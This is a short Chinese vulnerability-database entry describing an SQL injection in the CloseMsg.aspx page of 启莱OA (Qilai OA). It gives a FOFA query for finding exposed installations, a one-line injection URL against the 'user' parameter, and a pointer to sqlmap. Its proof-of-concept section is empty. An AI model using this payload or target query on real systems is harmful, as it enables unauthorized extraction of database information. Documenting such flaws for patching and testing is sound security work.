启莱OA CloseMsg.aspx SQL注入漏洞-棉花糖会员站

# 启莱OA CloseMsg.aspx SQL注入漏洞

## 漏洞描述

启莱OA CloseMsg.aspx文件存在SQL注入漏洞，攻击者通过漏洞可以获取数据库敏感信息

## 漏洞影响

> [!NOTE]
>
> 启莱OA

## FOFA

> [!NOTE]
>
> app=”启莱OA”

## 漏洞复现

登录页面如下

![](D:\知识星球\image\ql-1-1621166871878.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)

存在SQL注入的文件为 CloseMsg.aspx

“`
http://xxx.xxx.xxx.xxx/client/CloseMsg.aspx?user=’ and (select db_name())>0–&pwd=1
“`

使用SQLmap对参数 user 进行注入

## Goby & POC

文章版权归作者所有，未经允许请勿转载。

THE END

国内漏洞库

启莱OA CloseMsg.aspx SQL注入漏洞

请登录后发表评论

1新增沉浸式翻译插件deepl pro api共享

2用友NC-Cloud process SQL注入

3HertzBeat(赫兹跳动) 开源实时监控系统默认口令

4顺景ERP GetFile任意文件读取

5中成科信票务管理系统UploadHandler.ashx任意文件上传

6Hisense-海信公交智能公交企业管理系统apply Sql注入